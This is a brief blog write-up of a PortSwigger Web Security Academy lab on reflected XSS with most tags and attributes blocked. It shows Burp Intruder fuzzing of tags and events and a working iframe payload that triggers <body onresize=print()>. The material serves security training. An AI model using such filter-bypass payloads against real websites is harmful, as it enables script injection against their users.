Skip to content

chojnowski.it

Port Swigger Reflected XSS into HTML context with 1

Port Swigger Reflected XSS into HTML context with 1

Reflected XSS into HTML context with most tags and attributes blocked¶

Solution¶

Open the website: https://0a8500e5033247ff801fb20700ea00db.web-security-academy.net/¶

https://0a8500e5033247ff801fb20700ea00db.web-security-academy.net/

Input basic XSS payload¶

Payload: <script>alert(1)</script>
https://0a8500e5033247ff801fb20700ea00db.web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Which attributes/tags are blocked - Burp Intruder¶

I check which tags/attributes are blocked - Burp Intruder

Create wordlists - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet¶

Content from website: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet -->
Copy tags tp clipboard
Copy events to clipboard
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Reflected XSS into HTML context with most tags and attributes blocked]
└─$ head -n2 wordlist_*
==> wordlist_events.txt <==
onafterprint
onafterscriptexecute

==> wordlist_tags.txt <==
a
a2

Payloads configuration¶

Payloads configuration in Burp Intruder
- tags
- attributes
---
1 ) tags
allow - <body>
---
2) attributes
allow onresize

Input payload¶

Payload: <iframe src="https://0a4300cf031dc06380952bdb00b0008d.web-security-academy.net/?search=><body onresize=print()>" onload=this.style.width='100px'>

https://exploit-0a30002e034ac0dd809d2a6d018e000a.exploit-server.net/
Click "Store" --> "Deliver exploit  to victim"

Solved¶